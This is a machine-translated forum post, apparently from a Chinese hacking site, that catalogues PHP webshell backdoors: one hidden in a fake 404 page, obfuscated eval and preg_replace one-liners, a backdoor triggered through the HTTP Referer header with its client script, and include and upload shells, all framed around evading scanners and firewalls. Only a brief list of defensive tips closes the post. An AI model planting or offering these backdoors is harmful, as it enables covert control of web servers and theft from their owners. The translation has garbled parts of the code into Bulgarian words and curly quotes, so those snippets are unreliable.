Тази статия е огледална статия за машинен превод, моля, кликнете тук, за да преминете към оригиналната статия.

Изглед: 7260|Отговор: 0

[Безопасна комуникация] Оправете тези мощни PHP задни врати

[Копирай линк]
Публикувано в 1.12.2014 г. 21:41:13 ч. | | |
Третираме тези PHP backdoor програми с манталитет на учене, а много от PHP backdoor кодовете ни позволяват да видим колко добронамерени са програмистите.
Мощен PHP backdoor в едно изречение
Този вид задна врата позволява уебсайтове,Администраторите на сървъри са много проблемни и често трябва да сменят методите, за да извършват различни детекции, а много нови техники за писане не могат да бъдат открити и обработени с обикновените методи за откриване.
Днес ще изброим някои интересни PHP троянци.
1. Скрийте PHP понита с 404 страници:
[mw_shl_code=php, вярно] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Не е намерено</title>
</head><body>
<h1>Не е намерено</h1>
<p>Поисканият URL не беше намерен на този сървър.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
404 страница е често използван файл на сайта и малко хора ще го проверят и модифицират след като е препоръчан, така че можем да го използваме, за да скрием задната врата.

2. Безличен скрит PHP в едно изречение:
[mw_shl_code=php,true]<?php
session_start();
$_POST['код'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Задайте $_POST['code'] на $_SESSION['theCode'], и след това изпълнете $_SESSION['theCode'], като акцентът е, че няма код за подпис.
Ако използвате инструмент за сканиране, за да проверите кода, той няма да алармира и да постигне целта.

3. Супер стелт PHP бекдор:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Самата функция GET представлява троянец;
Как да използвате:
[mw_shl_code=php, вярно]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
След изпълнението, текущата директория генерира c.php изречение Trojan, когато параметърът A е оценен, генерирането на грешка Trojan не е успяло, и когато се заяви, също ще отчете грешка, но ще генерира троянски кон, който не може да бъде подценен.
Заявка за ниво, код за стартиране на PHP backdoor:
Този метод се реализира с два файла, файл 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", имплодира(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Документ 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset=UTF-8′);
//要执行的代码
$code= <<<КОД
phpinfo();
КОД;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= масив(
CURLOPT_URL => $url,
CURLOPT_HEADER => НЕВЯРНО,
CURLOPT_RETURNTRANSFER => ВЯРНО,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Пуснете код, кодиран от base64, през HTTP_REFERER в HTTP заявката, за да постигнете ефекта на задната врата.
Добре е да използваш тази идея, за да заобиколиш waf.
4.PHP инструмент за backdoor генератор Weevely
weevely е специфичен за PHPWebshell безплатен софтуер, може да се използва за симулиране на връзка, подобна на telnet. Weevely обикновено се използва за експлоатация на уеб програми, скриване на бекдори или използване на telnet-подобни методи вместо управление на уеб страници; сървърният PHP код, генериран от Weevely, е кодиран в base64, така че може да заблуждава основния антивирусен софтуер и IDS, След като качите сървърния код, обикновено можете да го пуснете директно през Weevely.
Функциите, използвани в задната врата, са често използвани функции за обработка на низове, а функции като eval и system, които се използват като правила за инспекция, няма да се появяват директно в кода, така че файлът за бекдор може да заобиколи проверката на инструмента за търсене на задната врата. Сканирането с инструмента за откриване на задни врати на тъмната група показва, че файлът не е застрашен.
Горното е общо въведение, а съответните методи на употреба не са представени тук, а просто научно популяризиране.
4. Три деформирани PHP троянки с едно изречение
      Първата:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Вторият
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Запишете паролата http://site/2.php?_=assert&__=eval($_POST['pass']) в кухненския нож е pass.
Ако използвате допълнителните данни от кухненския нож, те са по-скрити, или можете да използвате други инструменти за инжекции, защото са подадени след това.
Третата
[mw_shl_code=php, вярно] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ("рини") е кодирана оценка, която напълно избягва ключови думи, без да губи ефекта, карайки хората да повръщат кръв!
5. Накрая, избройте няколко напреднали PHP троянски задни врати:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Достъп"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
включват($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Достъп"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
В обобщение, тези PHP бекдори могат да се опишат като пълни, ако не сте внимателни, със сигурност ще бъдете измамени, и какъв е най-важният приоритет на нашата статия днес? Ключовите точки са в обобщението по-долу!
Как да се справим с PHP едноизречения задна врата:
Подчертаваме няколко ключови точки, и ако прочетете тази статия, вярвам, че не сте неспециалист, затова няма да бъда многословен:
  • Бъдете внимателни към сигурността при писане на PHP програми
  • Лог файловете на сървъра трябва да се четат често и да се архивират често
  • Строго разпределение на разрешения за всеки обект
  • Чести пакетни прегледи за сигурност на динамични файлове и директории
  • Научете как да провеждате ръчно антивирусно изследване и убийство на поведението на преценката
  • Останете на линия или се внедрете в активен лагер за киберсигурност
  • Дори функция може да се използва като правило за йерархична обработка на сървърната среда
Вярваме, че когато има повече сайтове за управление и голямо количество данни, трябва разумно да приложим някои помощни инструменти, но не трябва напълно да разчитаме на тези инструменти – технологиите постоянно се обновяват и подобряват, най-важното е да научите и разбирате мисленето на писането на тези мощни задни врати хора, а пренасянето на ролята може да ви донесе по-голям напредък.





Предишен:Firefox плъгини Плъгинът за хакване на Firefox превръща Firefox в инструмент за хакване със седем плъгина
Следващ:MS12-020 3389 0day exp Remote Desktop Execution код Python изходен код
Отричане:
Целият софтуер, програмни материали или статии, публикувани от Code Farmer Network, са само за учебни и изследователски цели; Горното съдържание не трябва да се използва за търговски или незаконни цели, в противен случай потребителите ще понесат всички последствия. Информацията на този сайт идва от интернет, а споровете за авторски права нямат нищо общо с този сайт. Трябва напълно да изтриете горното съдържание от компютъра си в рамките на 24 часа след изтеглянето. Ако ви харесва програмата, моля, подкрепете оригинален софтуер, купете регистрация и получете по-добри услуги. Ако има нарушение, моля, свържете се с нас по имейл.

Mail To:help@itsvse.com